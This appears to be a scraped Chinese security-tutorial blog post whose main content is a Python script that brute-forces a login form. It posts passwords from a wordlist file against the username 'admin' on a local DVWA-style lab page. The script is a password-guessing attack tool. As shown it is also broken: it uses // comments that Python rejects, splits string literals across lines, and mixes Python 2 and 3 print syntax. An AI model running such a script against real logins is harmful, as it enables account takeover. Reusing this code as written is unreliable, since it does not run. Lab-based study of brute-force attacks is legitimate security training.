zoukankan      html  css  js  c++  java
  • 从零开始学安全(三十六)●利用python 爆破form表单

    import sys
    import requests
    from requests.auth import HTTPBasicAuth
    
    
    
    def Brute_Force_Web(postData):
        res = requests.post('http://127.0.0.1/vulnerabilities/burtforce/bf_form.php', data=postData) //使用requests库进行post发包
        if "success" in res.text: //检查网页返回包中是否包含success
            print ("="*20 + "
    " + "Crack Sucess!")
            print ("Password is:" + passwd) //若网页返回包中包含success,输出正确的密码
            exit()
        else:
            print "Test password:",passwd,"is wrong"
    
    
    def GetPass():
        fp = open("password.txt", "r") //读取密码字典
        if fp == 0:
            print ("open file error!")
            return
        while 1:
            line = fp.readline() //读取密码字典一行
            if not line:
                break
            global passwd
            passwd = line.strip('
    ')
            postData = {
                'username': 'admin',
                'password': passwd,
                'submit': 'Login'
            } //构造post数据包中的各参数与值
            Brute_Force_Web(postData)
    
    
    GetPass()
  • 相关阅读:
    Shell脚本sed命令
    Shell脚本常用unix命令
    Shell的case语句
    3.5.2 数值之间的转换
    3.5.1 数学函数与常量
    3.5 运算符
    3.4.2 常量
    3.4.1 变量初始化
    3.4 变量
    Python异常捕捉的一个小问题
  • 原文地址:https://www.cnblogs.com/feizianquan/p/10595386.html
Copyright © 2011-2022 走看看